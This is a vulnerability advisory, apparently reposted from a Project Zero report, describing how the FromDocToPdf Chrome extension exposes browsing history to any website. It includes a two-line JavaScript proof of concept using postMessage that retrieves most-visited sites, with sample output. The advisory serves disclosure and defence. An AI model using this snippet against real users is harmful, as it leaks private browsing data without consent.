FromDocToPdf Browser History Disclosure

2018.04.18
Credit: Tavis Ormandy
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

FromDocToPdf: exposes browsing history to all websites I noticed this extension with 20 million users: https://chrome.google.com/webstore/detail/fromdoctopdf/mallpejgeafdahhflmliiahjdpgbegpk/internal?hl=en-US The extensions is pretty low quality, thankfully a lot of the scarier stuff seems to be disabled in Chrome, but it does expose browsing history to all pages (!!), any website can do this: > window.addEventListener("message", function(msg) { JSON.parse(msg.data).data.forEach(function(a) { console.log(a.title, a.url);}) }) > window.postMessage(JSON.stringify({destination: "mallpejgeafdahhflmliiahjdpgbegpk", cmd: "mostVisitedSites"}), "*") Example Domain <a href="http://www.example.com/" title="" class="" rel="nofollow">http://www.example.com/</a> Hacker News <a href="http://news.ycombinator.com/" title="" class="" rel="nofollow">http://news.ycombinator.com/</a> ... As far as I can tell, this is can't be used for anything other than leaking private data, so filing as low priority. I notified the CWS team, although I'm not sure how this extension managed to get 20M users, perhaps that requires some investigation. If the PoC is large, feel free to attach it as an attachment. This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: taviso


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top